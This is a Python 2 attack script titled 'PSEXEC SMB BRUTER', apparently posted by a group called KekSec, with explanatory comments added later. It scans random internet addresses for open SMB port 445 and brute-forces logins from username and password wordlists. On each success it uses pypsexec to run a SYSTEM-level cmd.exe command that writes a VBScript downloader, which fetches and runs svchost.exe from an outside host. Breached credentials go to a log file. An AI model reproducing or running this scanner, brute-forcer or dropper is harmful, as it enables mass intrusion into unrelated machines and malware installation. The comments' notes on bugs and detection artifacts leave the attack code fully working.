KekSec

PSEXEC SMB BRUTER

Jun 22nd, 2020
  1. import os
  2. from pypsexec.client import Client
  3. import socket
  4. import time
  5. import threading
  6. import itertools
  7. import random
# Credential wordlists (file names are the author's) are read whole and split
# on "\n" after stripping "\r"; a trailing newline leaves an empty "" entry in
# each list, which is later tried as a username/password like any other entry
# (nothing below filters it out).
fh1=open("user.txt", "r")
fh2=open("conficker.txt", "r")
users=fh1.read().replace("\r", "").split("\n")
passwords=fh2.read().replace("\r", "").split("\n")
fh1.close()
fh2.close()
# `global` at module level is a no-op; these are plain module globals.
# maxthreadsglobal caps in-flight testPW threads across all scanner threads;
# globalthreads is the live counter, incremented/decremented from worker
# threads with no lock (see testPW), so the count can drift.
global maxthreadsglobal
maxthreadsglobal=854
global globalthreads
globalthreads = 0
def testPW(ip, user, passwd, fh):
    """Try one SMB credential pair against ``ip`` with pypsexec.

    When the connect succeeds it installs a remote service and runs, with
    ``use_system_account=True``, a cmd.exe one-liner that writes a VBScript
    downloader to P.vbs in %tmp%; that script fetches
    http://download.loginserv.net/svchost.exe, saves it as oE.exe, starts it
    and deletes P.vbs.  A "HAX0RED" line is printed and appended to ``fh``
    (shared across threads, no lock).

    Control-flow notes: the inner ``finally`` ends with ``return False``,
    which overrides the ``return True`` above it and also suppresses any
    exception raised inside the inner ``try`` -- so the function returns
    False on every path, and on the success path ``globalthreads`` is
    decremented twice (once before ``return True``, once in ``finally``).
    The outer bare ``except`` swallows connect failures and anything raised
    by remove_service()/disconnect().  The trailing two lines after the
    try/except are unreachable.

    Host-side artifacts a defender can key on are all visible in the
    command string: a freshly created service, cmd.exe spawning wscript.exe
    on %tmp%\\P.vbs, the outbound HTTP request, and oE.exe in %tmp%.
    """
    global globalthreads
    globalthreads += 1   # unsynchronised read-modify-write across threads
    try:
        c = Client(ip, username=user, password=passwd)
        c.connect()
        try:
            c.create_service()
            # cmd.exe writes the VBS dropper to P.vbs via echo, then launches
            # it with wscript; the whole chain runs as SYSTEM.
            stdout, stderr, rc = c.run_executable("cmd.exe",
                                                  arguments="/q /c cd %tmp%&echo Set Nk=CreateObject(\"Microsoft.XMLHTTP\"):Nk.Open \"GET\",\"http://download.loginserv.net/svchost.exe\",False:Nk.Send:Set KS=CreateObject(\"ADODB.Stream\"):KS.Type=1:KS.Open:KS.Write Nk.responseBody:KS.SaveToFile \"oE.exe\",2:CreateObject(\"WScript.Shell\").Run \"oE.exe\":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"P.vbs\" >P.vbs&start wscript P.vbs",
                                                  use_system_account=True)
            print("HAX0RED ----> " + ip + ":" + user + ":" + passwd)
            fh.write("HAX0RED ----> " + ip + ":" + user + ":" + passwd + "\r\n")
            globalthreads -= 1
            return True   # never observed by callers: finally returns False
        finally:
            c.remove_service()
            c.disconnect()
            print("T3ST3D ----> " + ip + ":" + user + ":" + passwd)
            globalthreads -= 1
            return False  # overrides return True and masks inner exceptions
    except:
        print("T3ST3D ----> " + ip + ":" + user + ":" + passwd)
        globalthreads -= 1
        return False
    # unreachable: every path above has already returned
    globalthreads -= 1
    return False
def brute(ip, fh):
    """Spawn one testPW thread per (user, password) pair against ``ip``.

    Every ``maxthreads`` (10) spawns, or whenever the global in-flight
    counter has reached ``maxthreadsglobal``, it joins ``t`` -- only the most
    recently started thread, not all outstanding ones -- then sleeps 1-9 s
    and resets the local counter.  If the global cap is already hit before
    the first spawn, ``t`` is unbound and the join raises UnboundLocalError;
    that check is outside the try, so the error propagates to the caller.
    A failed Thread.start() is retried once after a random sleep and then
    silently dropped.
    """
    global maxthreadsglobal
    global globalthreads
    print("BRUTING ----> " + ip)
    threads = 0        # spawns since the last join
    maxthreads = 10    # join/sleep after this many spawns
    for user in users:
        for passwd in passwords:
            threads += 1
            if threads == maxthreads or globalthreads >= maxthreadsglobal:
                t.join()   # only the last thread started; t may be unbound
                time.sleep(random.randrange(1,10))
                threads = 0
            try:
                t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
                t.start()
            except:
                # one retry after a random pause, then give up on this pair
                time.sleep(random.randrange(1,10))
                try:
                    t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
                    t.start()
                except:
                    pass
def Scan(IP):
    """Return True if a TCP connect to ``IP``:445 (SMB) succeeds within 1 s.

    Any exception (timeout, refusal, unreachable host, malformed address) is
    swallowed by the bare ``except`` and reported as False.  The socket is
    only closed on the success path; on failure it is left for the garbage
    collector.
    """
    try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        s.connect((IP, 445))
        s.close()
        return True
    except:
        return False
  78.  
def gen_IP():
    """Return a random dotted-quad IPv4 string.

    The first octet is redrawn while it is in ``not_valid`` (10, 127, 169,
    172, 192, 185) -- a crude skip of whole /8s rather than the actual
    private/link-local ranges; no reason is given for excluding 185.
    Every octet comes from randrange(1, 256), so 0 never appears in any
    position.
    """
    not_valid = [10,127,169,172,192,185]
    first = random.randrange(1,256)
    while first in not_valid:
        first = random.randrange(1,256)
    ip = ".".join([str(first),str(random.randrange(1,256)),
    str(random.randrange(1,256)),str(random.randrange(1,256))])
    return ip
  87.  
def gen_IP_block():
    """Return a random /24 as an ip_range() string, e.g. ``"a.b.c.0-255"``.

    Same first-octet exclusion list as gen_IP().  Not referenced anywhere
    else in this file -- HaxThread builds its range string inline.
    """
    not_valid = [10,127,169,172,192,185]
    first = random.randrange(1,256)
    while first in not_valid:
        first = random.randrange(1,256)
    ip = ".".join([str(first),str(random.randrange(1,256)),
    str(random.randrange(1,256))])
    return ip+".0-255"
  96.  
def ip_range(input_string):
    """Yield every address in a dotted range such as ``"1.2.3.0-255"``.

    Each octet may be ``N`` or ``N-M``; ``N-M`` is inclusive and the octets
    are combined with itertools.product.  ``len(c)`` relies on ``map``
    returning a list, i.e. Python 2 (consistent with raw_input/xrange at the
    bottom of the file); on Python 3 the map object has no len() and this
    raises TypeError.  No validation of octet values is done.
    """
    octets = input_string.split('.')
    chunks = [map(int, octet.split('-')) for octet in octets]
    ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
 
    for address in itertools.product(*ranges):
        yield '.'.join(map(str, address))
def HaxThread(fh):
    """Scanner loop: draw random IPs forever and brute any with 445 open.

    When a hit's /24 also answers on .2 and .254 the author assumes the
    whole block is one server and only the hit itself is bruted; otherwise
    the entire /24 is walked and each host with 445 open is bruted in turn
    (the inner ``for`` rebinds ``IP``).  Exceptions from Scan/brute are
    printed and the loop continues; there is no back-off and no exit
    condition, so the thread runs until the process is killed.
    """
    while 1:
        try:
            IP = gen_IP()
            if Scan(IP):
                if Scan('.'.join(IP.split(".")[:3])+".2") and Scan('.'.join(IP.split(".")[:3])+".254"):#entire ip range most likely pointed to one server
                    brute(IP,fh)
                    continue
                else:
                    # sweep the hit's /24; IP is rebound by this loop
                    for IP in ip_range('.'.join(IP.split(".")[:3])+".0-255"):
                        if Scan(IP):
                            brute(IP,fh)
        except Exception as e:
            print(str(e))
            pass
  119.  
# Entry point (Python 2: raw_input/xrange).  Every scanner thread shares one
# append-mode handle to smb_vulnz.txt, which testPW writes to without a lock.
threads = int(raw_input("Threads: "))
 
fh = open("smb_vulnz.txt","a")
threadcount = 0
for i in xrange(0,threads):
    try:
        # threads are not daemonic: they keep the process alive until the
        # os.kill below
        threading.Thread(target=HaxThread, args=(fh,)).start()
        threadcount += 1
    except:
        pass
print("[*] Started " + str(threadcount) + " scanner threads!")
print("Scanning... Press enter 3 times to stop.")
 
# On Python 2 input() evaluates the typed line as an expression; an empty
# line raises SyntaxError in the main thread, so os.kill is never reached
# and the worker threads keep running (NOTE(review): confirm on Python 2).
for i in range(0,3):
    input()
 
# hard-kill our own process with signal 9; fh is never flushed or closed
os.kill(os.getpid(),9)